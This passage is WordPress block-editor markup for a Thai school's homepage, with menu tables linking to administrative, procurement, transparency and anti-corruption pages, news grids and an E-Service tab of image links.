/wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column 